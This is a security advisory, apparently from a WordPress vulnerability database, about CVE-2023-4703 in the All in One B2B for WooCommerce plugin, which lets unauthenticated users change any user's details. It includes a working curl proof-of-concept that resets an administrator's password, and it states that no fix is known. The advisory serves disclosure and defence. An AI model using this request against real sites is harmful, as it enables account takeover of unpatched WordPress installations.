WordPress Plugin Vulnerabilities

All in One B2B for WooCommerce <= 1.0.3 - Unauthenticated Privilege Escalation

Description

The plugin does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.

Proof of Concept

curl 'https://example.com/' -d 'action=save_customer_details&customer_id=ADMIN_USER_ID&customer_password=NEW_PASSWORD&customer_email=ADMIN_EMAIL&customer_display_name=Foo'

Affects Plugins

Plugin icon
all-in-one-b2b-for-woocommerce
No known fix

References

CVE
CVE-2023-4703

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
Alexander Concha
Verified
Yes
WPVDB ID
83278bbb-90e6-4465-a46d-60b4c703c11a

Timeline

Publicly Published
2023-09-04 (about 2 months ago)
Added
2023-09-04 (about 2 months ago)
Last Updated
2023-09-04 (about 2 months ago)

Other

Published
Title
Published
2022-12-27
Title
Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin
Published
2020-04-13
Title
Responsive Poll < 1.3.4 - Broken Authentication and Missing Capability Checks on AJAX calls
Published
2022-12-01
Title
ARMember < 5.6 - Unauthenticated Privilege Escalation
Published
2020-03-11
Title
Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation
Published
2020-05-13
Title
Site Kit by Google < 1.8.0 - Privilege Escalation to gain Search Console Access